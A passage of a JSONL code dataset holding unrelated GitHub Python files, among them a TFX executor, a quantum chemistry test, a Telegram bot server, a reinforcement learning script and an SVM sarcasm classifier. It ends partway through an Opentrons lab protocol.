file_pattern=io_utils.all_files_pattern(example_uri)))]\n\n dest_path = os.path.join(artifact_utils.get_split_uri([output_artifact], split_name),\n _FILTERED_EXAMPLES_FILE_PREFIX)\n\n _ = (\n [data for data in data_list]\n | 'FlattenExamples ({})'.format(split_name) >> beam.Flatten(pipeline=pipeline)\n | 'ParseExamples ({})'.format(split_name) >> beam.Map(tf.train.Example.FromString)\n | 'Filter ({})'.format(split_name) >> beam.Filter(predicate)\n | 'WriteStratifiedSamples ({})'.format(split_name) >> beam.io.WriteToTFRecord(\n dest_path,\n file_name_suffix='.gz',\n coder=beam.coders.ProtoCoder(tf.train.Example)))\n logging.info('Sampling result written to %s.', dest_path)\n","repo_name":"ssoudan/tfx_x","sub_path":"tfx_x/components/examples/filter/executor.py","file_name":"executor.py","file_ext":"py","file_size_in_byte":6667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27745411799","text":"import numpy as np\n\ndef digest_indices (ktn, indices):\n\n output = None\n\n if indices is 'all':\n output = np.arange(ktn.n_nodes, dtype=int)\n else:\n output = np.array(indices)\n\n return output\n\n","repo_name":"uibcdf/OpenTN-Old","sub_path":"openktn_old/old/utils/edges.py","file_name":"edges.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70251817124","text":"#! single-point UHF-MP2/cc-pVDZ on NH2\n# ROHF-MP2 is not available in NWChem\nimport os\nimport sys\n\nimport pytest\n\nimport qcdb\n\nfrom ..utils import *\n\n\ndef check_uhf_mp2(return_value, is_5050):\n ref = -55.566057523877\n mp2_tot = -55.711202243414\n mp2_corl = -0.145144719537\n scs_tot = -55.7299679\n scs_corl = -0.1639104\n mp2os = -0.1351989\n mp2ss = -0.0108263\n a5050corl = 0.5 * (mp2os + mp2ss)\n a5050tot = a5050corl + ref\n\n assert compare_values(ref, qcdb.variable(\"HF TOTAL ENERGY\"), 5, \"scf\")\n assert compare_values(mp2_tot, qcdb.variable(\"MP2 TOTAL ENERGY\"), 5, \"mp2 tot\")\n assert compare_values(mp2_corl, qcdb.variable(\"MP2 CORRELATION ENERGY\"), 5, \"mp2 corl\")\n assert compare_values(scs_tot, qcdb.variable(\"SCS-MP2 TOTAL ENERGY\"), 5, \"scs mp2 tot\")\n assert compare_values(scs_corl, qcdb.variable(\"SCS-MP2 CORRELATION ENERGY\"), 5, \"scs mp2 corl\")\n assert compare_values(mp2ss, qcdb.variable(\"MP2 SAME-SPIN CORRELATION ENERGY\"), 5, \"mp2 ss\")\n assert compare_values(mp2os, qcdb.variable(\"MP2 OPPOSITE-SPIN CORRELATION ENERGY\"), 5, \"mp2 os\")\n # if is_5050:\n # assert compare_values(a5050corl, qcdb.variable('CUSTOM SCS-MP2 CORRELATION ENERGY'), 5, 'mp2 scscorl')\n # assert compare_values(a5050tot, qcdb.variable('CUSTOM SCS-MP2 TOTAL ENERGY'), 5, 'mp2 scstot')\n\n\n@using(\"nwchem\")\n@pytest.mark.xfail(True, reason=\"scs vars NYI\", run=True)\ndef test_1_mp2_5050no():\n nh2 = qcdb.set_molecule(\n \"\"\"\n N 0.08546 -0.00020 -0.05091\n H -0.25454 -0.62639 0.67895\n H -0.25454 -0.31918 -0.95813\n \"\"\"\n )\n\n qcdb.set_options(\n {\n \"basis\": \"cc-pvdz\",\n #'scf__e_convergence': 1.0e-8,\n \"nwchem_scf__UHF\": True,\n \"nwchem_scf__nopen\": 1,\n \"nwchem_scf__maxiter\": 80,\n \"nwchem_scf__thresh\": 1.0e-8,\n }\n )\n print(\"Testing hf...\")\n val = qcdb.energy(\"nwc-mp2\", local_options={\"memory\": 3})\n check_uhf_mp2(val, is_5050=False)\n\n\n# @using(\"nwchem\")\n# def test_2_mp2_5050yes():\n# qcdb.set_options({\n# 'basis': 'cc-pvdz',\n# 'memory': '3000 mb',\n#'scf__e_convergence': 1.0e-8,\n# 'nwchem_scf__UHF': True,\n# 'nwchem_scf__nopen': 1,\n# 'nwchem_scf__maxiter': 80,\n# 'nwchem_scf__thresh': 1.0e-8,\n# })\n# print('Testing mp2...')\n# val = qcdb.energy('nwc-mp2')\n# check_uhf_mp2(val, is_5050=True)\n","repo_name":"qcdb/qcdb","sub_path":"qcdb/tests/nwchem_tests/test_sp_uhf_mp2.py","file_name":"test_sp_uhf_mp2.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"52"} +{"seq_id":"15331024055","text":"\"\"\"Add user query session table\n\nRevision ID: 213b541d942f\nRevises: 853e0e8aa6a0\nCreate Date: 2019-08-23 17:05:30.862737\nRevised 2019-09-30\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = '213b541d942f'\ndown_revision = '853e0e8aa6a0'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table(\n 'user_query_session',\n sa.Column('query_uuid', sa.String(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('query_blob', postgresql.JSONB(astext_type=sa.Text()), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], name='valid_user'),\n sa.PrimaryKeyConstraint('query_uuid'),\n )\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('user_query_session')\n # ### end Alembic commands ###\n","repo_name":"Zenysis/Harmony","sub_path":"web/server/migrations/versions/213b541d942f_add_user_query_sessions_table.py","file_name":"213b541d942f_add_user_query_sessions_table.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"52"} +{"seq_id":"7355410948","text":"import pygame\nfrom pygame.sprite import Sprite\n\nclass Ship(Sprite):\n def __init__(self,screen,ai_setting):\n super().__init__()\n self.screen=screen\n self.ai_setting=ai_setting\n self.image=pygame.image.load('images/ship.bmp')\n self.rect=self.image.get_rect()#获取飞船的矩形\n self.screen_rect=self.screen.get_rect()#获取屏幕的矩形\n #将飞船放在屏幕正中底部\n self.rect.centerx=self.screen_rect.centerx\n self.rect.bottom=self.screen_rect.bottom\n self.moving_right=False\n self.moving_left=False\n #飞船属性中存储小数值\n self.center=float(self.rect.centerx)\n #绘制飞船\n def blitme(self):\n self.screen.blit(self.image,self.rect)\n \n #更新飞船坐标\n def update(self):\n if self.moving_right and self.rect.rightself.screen_rect.left:\n self.center-=self.ai_setting.ship_speed_factor\n self.rect.centerx=self.center\n\n def center_ship(self):\n self.center=self.screen_rect.centerx\n ","repo_name":"gabrielzhen/MyPythonProject","sub_path":"MyPythonProject/practic/book_quikpython/python/alien_invasion/ship.py","file_name":"ship.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13676606892","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 1 13:18:16 2022\n\n@author: bradenlimb\n\"\"\"\n#%% Import Modules\nfrom IPython import get_ipython\nget_ipython().run_line_magic('reset','-sf')\n\n# import pandas as pd\n# import sys\nimport datetime\nbegin_time = datetime.datetime.now()\nimport shutil\nimport os\nfrom tqdm import tqdm\nimport glob\n\nimport pytz\nfrom win32com.propsys import propsys, pscon\n\n#%% Base Location\n\nsource_root = r'C:\\Users\\Braden Limb\\Downloads\\iCloud Photos (1)\\iCloud Photos'\ntarget_root = r'E:\\Video Diaries'\n\n\n\nrename_existing_files = False\nif rename_existing_files:\n filenames = [ item for item in os.listdir(target_root) if os.path.isfile(os.path.join(target_root, item)) ]\n filenames = [ x for x in filenames if \"._\" not in x ]\n filenames = [ x for x in filenames if \"IMG_\" in x ]\n #filenames = [filenames[1]]\n for filename in tqdm(filenames):\n \n filepath = f'{target_root}\\{filename}'\n properties = propsys.SHGetPropertyStoreFromParsingName(filepath)\n dt = properties.GetValue(pscon.PKEY_Media_DateEncoded).GetValue()\n \n if not isinstance(dt, datetime.datetime):\n # In Python 2, PyWin32 returns a custom time type instead of\n # using a datetime subclass. It has a Format method for strftime\n # style formatting, but let's just convert it to datetime:\n dt = datetime.datetime.fromtimestamp(int(dt))\n dt = dt.replace(tzinfo=pytz.timezone('UTC'))\n dt_local = dt.astimezone(pytz.timezone('America/Denver'))\n \n dt_local_str = dt_local.strftime('%Y-%m-%d')\n new_filename = f'{dt_local_str} Video Diary{filename[-4:]}'\n target_file = f'{target_root}\\{new_filename}'\n shutil.copyfile(filepath, target_file)\n\nmove_files = True\nif move_files:\n filenames = [ item for item in os.listdir(source_root) if os.path.isfile(os.path.join(source_root, item)) ]\n filenames = [ x for x in filenames if \"._\" not in x ]\n filenames = [ x for x in filenames if \"IMG_\" in x ]\n # filenames = [filenames[1]]\n for filename in tqdm(filenames):\n \n filepath = f'{source_root}\\{filename}'\n properties = propsys.SHGetPropertyStoreFromParsingName(filepath)\n dt = properties.GetValue(pscon.PKEY_Media_DateEncoded).GetValue()\n \n if not isinstance(dt, datetime.datetime):\n # In Python 2, PyWin32 returns a custom time type instead of\n # using a datetime subclass. It has a Format method for strftime\n # style formatting, but let's just convert it to datetime:\n dt = datetime.datetime.fromtimestamp(int(dt))\n dt = dt.replace(tzinfo=pytz.timezone('UTC'))\n dt_local = dt.astimezone(pytz.timezone('America/Denver'))\n \n dt_local_str = dt_local.strftime('%Y-%m-%d')\n new_filename = f'{dt_local_str} Video Diary{filename[-4:]}'\n target_file = f'{target_root}\\{new_filename}'\n if os.path.exists(target_file):\n target_split = os.path.splitext(target_file)\n numoffiles = len(glob.glob(rf'{target_split[0]}*'))\n target_file = target_split[0] + f'_{numoffiles+1}' + target_split[1]\n shutil.copyfile(filepath, target_file)\n\n#%% End of Code\nexecute_time = datetime.datetime.now() - begin_time\nprint('')\nprint('Code execution time: ', execute_time)\n","repo_name":"bradenlimb/Photo-Video-Copier","sub_path":"video_diaries_copier.py","file_name":"video_diaries_copier.py","file_ext":"py","file_size_in_byte":3387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27695523057","text":"import game\nimport numpy as np\nimport random\nfrom collections import Counter\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport time\nimport math\n\nITERATIONS = 300000\n\n#LFA for full model (10*21*2)\n\nhit = True\nstick = False\nactions = [hit, stick]\n\nalpha = 0.01\nepsilon = 0.05\nlmd = 0.8\ntheta = np.random.randn(420).reshape((420,1))\n\ndef psi(state, action):\n \n if state.player < 1 or state.player > 21:\n return np.zeros((420, 1))\n \n dealers = [int(state.dealer == x + 1) for x in range(0, 10)]\n players = [int(state.player == x + 1) for x in range(0, 21)]\n actions = [int(action == True), int(action == False)]\n \n psi = [1 if (i == 1 and j == 1 and k == 1) else 0\n for i in dealers for j in players for k in actions]\n\n return np.array(psi).reshape((420, 1))\n \ndef Q(state, action, theta):\n return np.matmul(psi(state, action).T, theta)\n\ndef V(q):\n return np.max(q, axis=2) \n \ndef epsilon_greedy(state, theta):\n \n if np.random.random() < epsilon:\n return np.random.choice(actions)\n else:\n return bool(np.argmax([Q(state, a, theta) for a in actions]))\n \ndef generate_Q(weight):\n \n Q_matrix = np.zeros((10, 21, 2))\n \n for i in range(0, 10, 1):\n for j in range(0, 21, 1):\n for k in range(0, 2, 1):\n Q_matrix[i][j][k] = Q(game.State(i+1, j+1, True), bool(k), weight)\n \n return Q_matrix\n \nif __name__ == \"__main__\": \n\n Q_star = np.load('Q_star.npy')\n\n for k in range(1, ITERATIONS):\n\n terminal = False\n \n state = game.initialise_state()\n action = epsilon_greedy(state, theta)\n \n E_matrix = np.zeros_like(theta)\n \n while not terminal: \n # take action a, observe r, s'\n next_state, reward = game.step(state, action)\n # choose a' from s' using policy from Q\n \n terminal = next_state.terminal\n \n if not terminal:\n next_action = epsilon_greedy(state, theta)\n delta = reward + Q(next_state, next_action, theta) - Q(state, action, theta)\n else:\n delta = reward - Q(state, action, theta)\n \n E_matrix = np.add(lmd * E_matrix, psi(state, action))\n\n theta += alpha * delta * E_matrix\n \n if not terminal:\n state = next_state\n action = next_action\n \n if k % 10000 == 0:\n print(\"MSE: \" + str(round(np.sum((Q_star - generate_Q(theta)) ** 2),2)))\n\n game.visualise(V(generate_Q(theta))) ","repo_name":"Soundpulse/easy21-rl","sub_path":"lfa-full.py","file_name":"lfa-full.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73299016484","text":"import argparse\nimport json\nimport os\n\nimport numpy as np\nfrom sklearn import svm\nfrom sklearn.metrics import classification_report, confusion_matrix\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import FunctionTransformer, StandardScaler\n\nfrom config import CONFIG_BY_KEY\nfrom data_loader import DataLoader\nfrom data_loader import DataHelper\n\nRESULT_FILE = \"./output/{}.json\"\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--config-key', default='', choices=list(CONFIG_BY_KEY.keys()))\n return parser.parse_args()\n\n\nargs = parse_args()\nprint(\"Args:\", args)\n\n# Load config\nconfig = CONFIG_BY_KEY[args.config_key]\n\n# Load data\ndata = DataLoader(config)\n\n\ndef svm_train(train_input, train_output):\n clf = make_pipeline(\n StandardScaler() if config.svm_scale else FunctionTransformer(lambda x: x, validate=False),\n svm.SVC(C=config.svm_c, gamma='scale', kernel='rbf')\n )\n\n return clf.fit(train_input, np.argmax(train_output, axis=1))\n\n\ndef svm_test(clf, test_input, test_output):\n\n probas = clf.predict(test_input)\n y_pred = probas\n y_true = np.argmax(test_output, axis=1)\n\n # To generate random scores\n # y_pred = np.random.randint(2, size=len(y_pred))\n\n # To generate majority baseline\n # y_pred = [0]*len(y_pred)\n \n result_string = classification_report(y_true, y_pred, digits=3)\n print(confusion_matrix(y_true, y_pred))\n print(result_string)\n return classification_report(y_true, y_pred, output_dict=True, digits=3), result_string\n\n\n\ndef trainIO(train_index, test_index):\n\n # Prepare data\n train_input, train_output = data.getSplit(train_index)\n test_input, test_output = data.getSplit(test_index)\n\n datahelper = DataHelper(train_input, train_output, test_input, test_output, config, data)\n\n train_input = np.empty((len(train_input), 0))\n test_input = np.empty((len(test_input), 0))\n\n if config.use_target_text:\n\n if config.use_bert:\n train_input = np.concatenate([train_input, datahelper.getTargetBertFeatures(mode='train')], axis=1)\n test_input = np.concatenate([test_input, datahelper.getTargetBertFeatures(mode='test')], axis=1)\n else:\n train_input = np.concatenate([train_input,\n np.array([datahelper.pool_text(utt)\n for utt in datahelper.vectorizeUtterance(mode='train')])], axis=1)\n test_input = np.concatenate([test_input,\n np.array([datahelper.pool_text(utt)\n for utt in datahelper.vectorizeUtterance(mode='test')])], axis=1)\n\n if config.use_target_video:\n train_input = np.concatenate([train_input, datahelper.getTargetVideoPool(mode='train')], axis=1)\n test_input = np.concatenate([test_input, datahelper.getTargetVideoPool(mode='test')], axis=1)\n\n if config.use_target_audio:\n train_input = np.concatenate([train_input, datahelper.getTargetAudioPool(mode='train')], axis=1)\n test_input = np.concatenate([test_input, datahelper.getTargetAudioPool(mode='test')], axis=1)\n\n if train_input.shape[1] == 0:\n print(\"Invalid modalities\")\n exit(1)\n\n # Aux input\n\n if config.use_author:\n train_input_author = datahelper.getAuthor(mode=\"train\")\n test_input_author = datahelper.getAuthor(mode=\"test\")\n\n train_input = np.concatenate([train_input, train_input_author], axis=1)\n test_input = np.concatenate([test_input, test_input_author], axis=1)\n\n if config.use_context:\n if config.use_bert:\n train_input_context = datahelper.getContextBertFeatures(mode=\"train\")\n test_input_context = datahelper.getContextBertFeatures(mode=\"test\")\n else:\n train_input_context = datahelper.getContextPool(mode=\"train\")\n test_input_context = datahelper.getContextPool(mode=\"test\")\n\n train_input = np.concatenate([train_input, train_input_context], axis=1)\n test_input = np.concatenate([test_input, test_input_context], axis=1)\n\n \n train_output = datahelper.oneHotOutput(mode=\"train\", size=config.num_classes)\n test_output = datahelper.oneHotOutput(mode=\"test\", size=config.num_classes)\n\n return train_input, train_output, test_input, test_output\n\n\n\ndef trainSpeakerIndependent(model_name=None):\n\n config.fold = \"SI\"\n \n (train_index, test_index) = data.getSpeakerIndependent()\n train_input, train_output, test_input, test_output = trainIO(train_index, test_index)\n\n clf = svm_train(train_input, train_output)\n svm_test(clf, test_input, test_output)\n\n\n\ndef trainSpeakerDependent(model_name=None):\n \n # Load data\n data = DataLoader(config)\n\n # Iterating over each fold\n results=[]\n for fold, (train_index, test_index) in enumerate(data.getStratifiedKFold()):\n\n # Present fold\n config.fold = fold+1\n print(\"Present Fold: {}\".format(config.fold))\n\n train_input, train_output, test_input, test_output = trainIO(train_index, test_index)\n\n clf = svm_train(train_input, train_output)\n result_dict, result_str = svm_test(clf, test_input, test_output)\n\n results.append(result_dict)\n\n # Dumping result to output\n if not os.path.exists(os.path.dirname(RESULT_FILE)):\n os.makedirs(os.path.dirname(RESULT_FILE))\n with open(RESULT_FILE.format(model_name), 'w') as file:\n json.dump(results, file)\n\n\ndef printResult(model_name=None):\n\n results = json.load(open(RESULT_FILE.format(model_name), \"rb\"))\n\n weighted_precision, weighted_recall = [], []\n weighted_fscores = []\n\n print(\"#\"*20)\n for fold, result in enumerate(results):\n weighted_fscores.append(result[\"weighted avg\"][\"f1-score\"])\n weighted_precision.append(result[\"weighted avg\"][\"precision\"])\n weighted_recall.append(result[\"weighted avg\"][\"recall\"])\n\n print(\"Fold {}:\".format(fold+1))\n print(\"Weighted Precision: {} Weighted Recall: {} Weighted F score: {}\".format(result[\"weighted avg\"][\"precision\"],\n result[\"weighted avg\"][\"recall\"],\n result[\"weighted avg\"][\"f1-score\"]))\n print(\"#\"*20)\n print(\"Avg :\")\n print(\"Weighted Precision: {:.3f} Weighted Recall: {:.3f} Weighted F score: {:.3f}\".format(np.mean(weighted_precision),\n np.mean(weighted_recall),\n np.mean(weighted_fscores)))\n \n\nif __name__ == \"__main__\":\n\n if config.speaker_independent:\n trainSpeakerIndependent(model_name=config.model)\n else:\n for _ in range(config.runs):\n trainSpeakerDependent(model_name=config.model)\n printResult(model_name=config.model)\n","repo_name":"declare-lab/multimodal-deep-learning","sub_path":"MUStARD/train_svm.py","file_name":"train_svm.py","file_ext":"py","file_size_in_byte":7083,"program_lang":"python","lang":"en","doc_type":"code","stars":570,"dataset":"github-code","pt":"52"} +{"seq_id":"42666900893","text":"'''\ndear future me I am so sorry for the mess you are about to see.\nI have worked for so long on this very simple idea rewriting it a bunch of times\nthere is still a few of totaly useless things here I am too afraid to touch \n\nregardless this seems to work and while I cant test it at scale I think it should work at scale too\n\nfor future refrence this is why we dont pretend to know java... you are a python devloper for fuck sake write prosedural code\n'''\n\nimport json\n\nimport os\nfrom os.path import join,exists,getctime\nfrom datetime import datetime\n\nfrom telegram import ForceReply, Update\nfrom telegram.ext import Application, CommandHandler, ContextTypes, MessageHandler, filters\n\nimport asyncio \n\nimport openai \nimport json\n\nimport os\nfrom os.path import join,exists\nfrom datetime import datetime\nimport time\n\nfrom telegram import ForceReply, Update\nfrom telegram.ext import Application, CommandHandler, ContextTypes, MessageHandler, filters\n\nimport asyncio\n\nfrom calander import s_in_d\n\n\nasync def send_message(bot,user_id,message):\n #sends and logs a message\n path=join('users',str(user_id))\n with open(join(path,'init.json'),'r') as f:\n user_info = json.load(f)\n chat_id=user_info['chat_id']\n \n t=datetime.now().strftime('%Y-%m-%d %H:%M:%S')+'.json'\n\n await bot.send_message(chat_id, message)\n with open(join(path,'send_messages',t), 'w') as f:\n json.dump({'chat_id': chat_id, 'message': message}, f)\n \n\n\nasync def log_update(user_id,update):\n path=join('users',str(user_id))\n with open(join(path,'init.json'),'r') as f:\n user_info = json.load(f)\n chat_id=user_info['chat_id']\n \n t=datetime.now().strftime('%Y-%m-%d %H:%M:%S')+'.json'\n\n with open(join(path,'recived_messages',t), 'w') as f:\n json.dump({'chat_id': chat_id, 'message': update.message.text}, f) \n\nclass FolowUpCalls:\n user_threads={}\n \n @classmethod\n def set_func(cls,func):\n cls.func=[func]\n #this is here so that scedualed responses work even after a server restart\n \n def __init__(self, bot,user_id, message, delay):\n if message==None:\n return\n try:\n self.user_threads[user_id].cancel()\n except KeyError:\n pass\n\n self.bot = bot\n self.user_id=user_id\n self.message = message\n self.delay = delay\n\n self.path=join('users',str(self.user_id),'scedualed_respond.json')\n with open(self.path, 'w') as f:\n json.dump({'message': self.message,'delay': delay,'time': datetime.now().strftime('%Y-%m-%d %H:%M:%S')}, f)\n self.task = asyncio.create_task(self.run())\n self.user_threads[user_id]=self\n self.done_waiting=False\n\n async def run(self):\n await asyncio.sleep(self.delay)\n self.done_waiting=True\n delay,notes=await self.func[0](self.bot,self.user_id, self.message)\n \n if notes==None:\n return\n\n FolowUpCalls(self.bot,self.user_id,notes,delay)\n #os.remove(self.path)\n #return val\n #with open(self.path, 'w') as f:\n # json.dump({'chat_id': self.chat_id, 'message': self.message, 'time': datetime.now().strftime('%Y-%m-%d %H:%M:%S')}, f)\n \n\n def cancel(self):\n #if not self.task.done():\n if not self.done_waiting:\n self.task.cancel()\n return\n if exists(self.path):\n os.remove(self.path)\n\nclass Responder():\n '''\n this class handles the severs reaction to a single message. \n it should handle all the ids and basic loging for us \n\n note that we still need to use async and manage our own usage cap \n sending messages is also not in the scope of this class\n '''\n def __init__(self,response,reminder,errored_reminder,start):\n self.wrapped_response=response #this will allways excute to complesion before new messages are considered \n self.wrapped_reminder=reminder #this will wait and get intrupted whenever a new message is send\n self.wrapped_errored_reminder=errored_reminder #this will excute if a reminder was server errored\n self.wrapped_start=start #this is excuted when a new user shows up\n\n #self.user_threads = {}\n\n async def respond(self,update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n \"\"\"main response function\"\"\"\n user = update.effective_user\n path=join('users',str(user.id))\n\n try:\n FolowUpCalls.user_threads[user.id].cancel()\n except KeyError:\n pass\n\n asyncio.create_task(log_update(user.id,update))\n #response_text='got message'#await gpt_logic(update)\n delay,notes=await self.wrapped_response(context.bot,user.id,update.message.text)\n\n w=FolowUpCalls(context.bot,user.id,notes,delay)\n #self.user_threads[user.id]=w\n\n #await w.task\n\n\n async def start(self,update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n \"\"\"Send a message when the command /start is issued.\"\"\"\n user = update.effective_user\n path=join('users',str(user.id))\n os.makedirs(path,exist_ok=True)\n \n if(not exists(join(path,'init.json'))):\n print('new user joined!')\n with open(join(path,'init.json'),'w') as f:\n json.dump({'name':user.name,'time':datetime.now().strftime('%Y-%m-%d %H:%M:%S')}, f)\n \n os.makedirs(join(path,'send_messages'))\n os.makedirs(join(path,'recived_messages'))\n\n \n # Update chat_id\n with open(join(path,'init.json'),'r') as f:\n user_info = json.load(f)\n user_info['chat_id'] = update.message.chat_id\n with open(join(path,'init.json'),'w') as f:\n json.dump(user_info, f)\n \n #await update.message.reply_html(rf\"Hi {user.mention_html()}!\", reply_markup=ForceReply(selective=True))\n await self.wrapped_start(context.bot,user.id,user)#send_message(context.bot,user.id,rf\"Hi {user.name}!\")\n\n\n async def initialize_tasks(self,application):\n #this is for after a restart so that all the waiting code runs\n print('looking for callbacks')\n bot=application.bot\n user_directories = [d for d in os.listdir('users') if os.path.isdir(join('users', d))]\n for user_dir in user_directories:\n path = join('users', user_dir)\n user_id=int(user_dir)\n if exists(join(path, 'scedualed_respond.json')):\n with open(join(path, 'scedualed_respond.json'), 'r') as f:\n respond_info = json.load(f)\n time_sent = datetime.strptime(respond_info['time'], '%Y-%m-%d %H:%M:%S')\n time_now = datetime.now()\n delay = (time_sent - time_now).total_seconds()\n \n if time_sent > time_now:\n w = FolowUpCalls( bot,user_id, respond_info['message'], delay)\n else:\n delay,message=await self.wrapped_errored_reminder(bot,user_id,respond_info['message'])\n w = FolowUpCalls(bot,user_id,message, delay)\n\n #self.user_threads[user_id] = w\n else: \n print(f'error missing response in:\\n{path}')\n \n print('resolved callbacks. runing as usual')\n\n\nclass Conversation_Manager():\n #when using this u can just overide the process message method\n convs={} \n\n def __init__(self,path:str,bot,buffer_time=3):\n self.semaphore = asyncio.Semaphore(1)\n\n with open(join(path,'init.json'),'r') as f:\n user_info = json.load(f)\n self.chat_id=user_info['chat_id']\n self.bot=bot\n \n self.path=path\n self.save_path=join(path,'texting.txt')\n self.last_out=0 #this is unix time\n #self.mem_path=join(path,'scedualed_respond.json')\n #self.lock=0\n self.buffer_time=buffer_time\n \n #self.task=asyncio.create_task(asyncio.sleep(0))\n async def lock(self):\n await self.semaphore.acquire()\n\n def free(self):\n self.semaphore.release() \n \n @classmethod \n def from_id(cls,idx,bot):\n try:\n return cls.convs[idx]\n except KeyError:\n path=join('users',str(idx))\n ans=cls(path,bot)\n cls.convs[idx]=ans \n return ans\n \n async def hook(self,message,path):\n #await self.lock()\n \n await self.send_message(f'we got:\\n{message}')\n #self.free()\n\n async def _hook(self):\n #await self.lock()\n m=await self.done_gathering()\n if m:\n await self.hook(m,self.path)\n #self.free()\n\n async def send_message(self,message):\n #assert not self.lock\n \n t=datetime.now().strftime('%Y-%m-%d %H:%M:%S')+'.json'\n await self.bot.send_message(self.chat_id, message)\n with open(join(self.path,'send_messages',t), 'w') as f:\n json.dump({'chat_id': self.chat_id, 'message': message}, f)\n\n async def add(self,message):\n with open(self.save_path,'a') as f:\n f.write(message+'\\n\\n')\n #self.task.cancel()\n \n #if time.time()-self.last_out>self.buffer_time:\n asyncio.create_task(self._hook())\n\n\n async def done_gathering(self):\n #await self.lock()\n await self.lock()\n #print('locked')\n t=time.time()-self.last_out\n await asyncio.sleep(self.buffer_time-t)\n #print('woke')\n\n if exists(self.save_path):\n with open(self.save_path) as f:\n message=f.read()\n os.remove(self.save_path)\n else: \n message= '' \n\n self.last_out=time.time()\n \n self.free()\n #print('free')\n return message\n\n\n\n#def tel_main(tel,response,reminder,errored_reminder,start) -> None:\n \"\"\"Start the bot.\"\"\"\n #responder=Responder(response,reminder,errored_reminder,start)\ndef tel_main(tel,responder) -> None:\n FolowUpCalls.set_func(responder.wrapped_reminder)\n\n application = Application.builder().token(tel).post_init(responder.initialize_tasks).build()\n \n application.add_handler(CommandHandler(\"start\", responder.start))\n application.add_handler(MessageHandler(filters.TEXT & ~filters.COMMAND, responder.respond))\n \n application.run_polling(allowed_updates=Update.ALL_TYPES)\n\nif __name__ == \"__main__\":\n\n #thread_count=0\n print('started server')\n with open('secrets') as f:\n tel,ai=tuple(f.read().split('\\n'))[:2]\n\n openai.api_key=ai\n #self.user_threads = {} # this stores the callback threads \n\n async def response(bot,user_id,message):\n #print(bot)\n conv=Conversation_Manager.from_id(user_id,bot)\n \n await conv.add(message)\n\n return 10,'2'\n\n async def reminder(bot,user_id,notes:str):\n #print(junk)\n #print(bot)\n conv=Conversation_Manager.from_id(user_id,bot)\n \n \n m= await conv.done_gathering()\n if m:\n await conv.send_message(f'reminder got:\\n{m}')\n await conv.send_message(f'reminder:\\n{notes}')\n \n secs=int(notes)\n if secs>4:\n ans=None \n else:\n ans=str(2*secs)\n return secs,ans\n\n async def errored_reminder(bot,user_id,notes:str):\n conv=Conversation_Manager.from_id(user_id,bot)\n \n #conv.task.cancel()\n m= await conv.done_gathering()\n if m:\n await conv.send_message(f'found:\\n{m}\\n in memory')\n await conv.send_message(f'server error delayed response:\\n{notes}')\n\n secs=int(notes)\n if secs>4:\n ans=None \n else:\n ans=str(2*secs)\n return secs,ans\n #await send_message(bot,user_id,'server error delayed response:\\n'+notes) \n\n async def start(bot,user_id,user):\n await send_message(bot,user_id,f'hi {user.name}')\n\n responder=Responder(response,reminder,errored_reminder,start)\n print('tel server')\n tel_main(tel,responder)\n #tel_main(tel,start=start,response=response,errored_reminder=errored_reminder,reminder=reminder)","repo_name":"nevakrien/ai_secretary","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":12172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26508584679","text":"from django.urls import path\r\nfrom . import views\r\n\r\n\r\nurlpatterns = [\r\n path('invoiceupload/',views.invoice_upload,name='invoiceupload'),\r\n path('invoiceupdate/',views.invoice_update,name='invoiceupdate'),\r\n path('invoicecreate/',views.invoice_create,name='invoicecreate'),\r\n path('invoiceinfo/',views.invoice_info,name='invoiceinfo'),\r\n]","repo_name":"rishu9304/adcurate","sub_path":"invoice/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1485451566","text":"import opentrons.execute\nfrom opentrons import protocol_api\n\n# Metadata (has to be placed in the main directory of the protocol api)\nmetadata = {\n 'protocolName': 'Preparing Immunostained hMSC Cells',\n 'author': 'Your Name',\n 'apiLevel': '2.7'\n}\n\ndef run(protocol: protocol_api.ProtocolContext):\n\n # Define labware\n plate_6_well = protocol.load_labware(\"corning_6_wellplate_16.8ml_flat\", \"11\")\n reagent_rack = protocol.load_labware(\"opentrons_24_aluminumblock_generic_2ml_screwcap\", \"10\")\n tiprack_200 = protocol.load_labware('opentrons_96_tiprack_300ul', '7')\n tiprack_300 = protocol.load_labware('opentrons_96_tiprack_300ul', '8')\n\n # Define pipettes\n p50 = protocol.load_instrument(\"p50_single\", \"left\", tip_racks=[tiprack_200])\n p300 = protocol.load_instrument(\"p300_single\", \"right\", tip_racks=[tiprack_300])\n\n # Define reagents\n fixative_solution = reagent_rack.wells_by_name()['A1']\n permeabilization_solution = 